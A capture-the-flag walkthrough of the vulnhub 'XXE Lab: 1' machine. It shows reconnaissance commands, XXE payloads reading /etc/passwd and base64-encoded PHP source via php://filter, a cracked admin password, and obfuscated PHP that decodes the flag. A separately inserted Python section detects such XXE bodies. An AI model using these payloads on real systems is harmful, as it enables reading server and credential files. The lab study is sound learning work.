wait's〔三生石畔〕 A good person, however lost in striving, will in the end know that there is one right path. (Goethe)
[Penetration Testing - Practice Range] No.32: XXE Lab: 1 (vulnhub) penetration test
Posted on: | Categories: Security Testing, Certifications | Comments: 1 | Views: 1459

I. Preface

Main exploitation path: use the XXE vulnerability, with base64 encoding and decoding, to read the PHP source files; obtain the address of the file the flag redirects to and decode it with base32 and then base64; after obtaining the encoded flag, load it in a PHP environment to read the flag.

II. Target information

Range: vulnhub.com
Machine name: XXE Lab: 1
Difficulty: easy
Release date: 8 August 2018
Download: https://www.vulnhub.com/entry/xxe-lab-1,254/
Notes:

III. Virtual machine setup
VMware; network mode: NAT; DHCP: enabled; IP address: assigned automatically
Attacker IP: 192.168.169.129
Target IP: 192.168.169.178

IV. Information gathering
1. Find the target's IP address
└─$ sudo arp-scan -I eth0 -l

2. Scan the target's ports and identify the services behind them
└─$ sudo nmap -p- 192.168.169.178

└─$ sudo nmap -p80,5335 -sV -A 192.168.169.178

3. Visit the website and run a routine path scan
http://192.168.169.178/

└─$ dirsearch -u 192.168.169.178

4. Path discovery
http://192.168.169.178/robots.txt

http://192.168.169.178/xxe/

http://192.168.169.178/xxe/admin.php

5. Attempt a login and capture the request: the login request is built from XML

6. Try an XXE payload; /etc/passwd is read successfully
“Knowledge point: PHP pseudo-protocols (php:// wrappers) explained”

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [
<!ENTITY admin SYSTEM "file:///etc/passwd">
]>

<root><name>&admin;</name><password>123456</password></root>

7. Try reading a local file to find the login password

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php"> ]>

<root><name>&admin;</name><password>123456</password></root>
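A defender-side check for request bodies like the two above, added here as an example (not code from the post or the lab): it pulls the DTD out of an XML login body, lists every external entity it declares, records whether the document actually expands it, and unwraps the resource= target of a php://filter URI so the payload can be classified from a WAF hook or a request log. It goes beyond this lab by also catching an external DTD reference and parameter entities. The sample bodies are constructed copies of the payloads shown in steps 6 and 7.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# "<!DOCTYPE x [ ... ]>": the internal subset holds inline entity declarations;
# the head may instead reference an external DTD ("<!DOCTYPE x SYSTEM 'uri'>").
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b(?P<head>[^\[>]*)(?:\[(?P<subset>.*?)\])?\s*>", re.S | re.I)
# <!ENTITY [%] name SYSTEM "uri"> or the PUBLIC "id" "uri" form
ENTITY_RE = re.compile(r"<!ENTITY\s+(?P<pct>%\s*)?(?P<name>[\w.\-]+)\s+"
                       r"(?:SYSTEM\s+|PUBLIC\s+[\"'][^\"']*[\"']\s+)[\"'](?P<uri>[^\"']*)[\"']", re.I)
EXT_DTD_RE = re.compile(r"\bSYSTEM\s+[\"'](?P<uri>[^\"']*)[\"']", re.I)

@dataclass
class ExternalRef:
    name: str                       # entity name, or "<!DOCTYPE>" for an external DTD
    uri: str
    scheme: str                     # "file", "php", "http", ... ("" when there is none)
    referenced: bool                # the body actually expands the entity
    resource: Optional[str] = None  # target wrapped by php://filter, if any

def _scheme(uri: str) -> str:
    return uri.split(":", 1)[0].lower() if ":" in uri else ""

def inspect_xml_body(body: str) -> List[ExternalRef]:
    """List every external entity or DTD that an XML request body declares."""
    m = DOCTYPE_RE.search(body)
    if not m:
        return []
    refs = []
    ext = EXT_DTD_RE.search(m.group("head"))
    if ext:  # an external DTD is fetched before parsing, so treat it as referenced
        refs.append(ExternalRef("<!DOCTYPE>", ext.group("uri"), _scheme(ext.group("uri")), True))
    subset, document = m.group("subset") or "", body[m.end():]
    for e in ENTITY_RE.finditer(subset):
        name, uri = e.group("name"), e.group("uri")
        # general entities expand as &name; in the body, parameter entities as %name; in the DTD
        used = f"%{name};" in subset if e.group("pct") else f"&{name};" in document
        res = re.search(r"resource=([^&\s\"']+)", uri) if _scheme(uri) == "php" else None
        refs.append(ExternalRef(name, uri, _scheme(uri), used, res.group(1) if res else None))
    return refs

def is_xxe_attempt(body: str) -> bool:
    """A login body has no business declaring any external entity or DTD at all."""
    return any(r.scheme for r in inspect_xml_body(body))

# Constructed sample bodies: a normal login and the two payloads used against this lab.
BENIGN_LOGIN = '<?xml version="1.0"?><root><name>administhebest</name><password>x</password></root>'
PASSWD_PAYLOAD = ('<?xml version="1.0" encoding="UTF-8"?>\n<!DOCTYPE a [\n<!ENTITY admin SYSTEM '
                  '"file:///etc/passwd">\n]>\n<root><name>&admin;</name><password>123456</password></root>')
FILTER_PAYLOAD = PASSWD_PAYLOAD.replace('file:///etc/passwd', 'php://filter/read=convert.base64-encode/resource=admin.php')
```

Run `inspect_xml_body()` over captured bodies to get the list of references, or `is_xxe_attempt()` for a simple alert decision.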

8. Decode the base64
The decoded source reveals the username, the password hash and what looks like the flag's address:

if ($_POST['username'] == 'administhebest' &&
    md5($_POST['password']) == 'e6e061838856bf47e1de730719fb2609') {
    echo "You have entered valid use name and password <br />";
    $flag = "Here is the <a style='color:FF0000;' href='/flagmeout.php'>Flag</a>";
    // ... (excerpt; the rest of admin.php is omitted here)
}

9. Crack the MD5 and try the flag's address
e6e061838856bf47e1de730719fb2609 => admin@123

http://192.168.169.178/xxe/flagmeout.php
After some trial and error, the flag URL only loads when requested under the xxe/ path; the page source then gives the hint:
the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5)

10. Decode twice: base32, then base64

Base32 decode: JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5 => L2V0Yy8uZmxhZy5waHA=

Base64 decode: L2V0Yy8uZmxhZy5waHA= => /etc/.flag.php

11. With the path in hand, go back to Burp and use XXE again to read the target file:

<!DOCTYPE ANY [
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php"> ]>

<root><name>&admin;</name><password>123456</password></root>

The following code is obtained (after base64 decoding):
$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$À=+_;$Á=$Â=$Ã=$Ä=$Æ=$È=$É=$Ê=$Ë=++$Á[];$Â++;$Ã++;$Ã++;$Ä++;$Ä++;$Ä++;$Æ++;$Æ++;$Æ++;$Æ++;$È++;$È++;$È++;$È++;$È++;$É++;$É++;$É++;$É++;$É++;$É++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$__('$_="'.$___.$Á.$Â.$Ã.$___.$Á.$À.$Á.$___.$Á.$À.$È.$___.$Á.$À.$Ã.$___.$Á.$Â.$Ã.$___.$Á.$Â.$À.$___.$Á.$É.$Ã.$___.$Á.$É.$À.$___.$Á.$É.$À.$___.$Á.$Ä.$Æ.$___.$Á.$Ã.$É.$___.$Á.$Æ.$Á.$___.$Á.$È.$Ã.$___.$Á.$Ã.$É.$___.$Á.$È.$Ã.$___.$Á.$Æ.$É.$___.$Á.$Ã.$É.$___.$Á.$Ä.$Æ.$___.$Á.$Ä.$Á.$___.$Á.$È.$Ã.$___.$Á.$É.$Á.$___.$Á.$É.$Æ.'"');$__($_);

12. Save the code locally and run it in a PHP environment (phpStudy)
Add the PHP open and close tags <?php ?> at the beginning and end.

Loading it under phpStudy yields the flag:
Failure evaluating code: SAFCSP{xxe_is_so_easy}
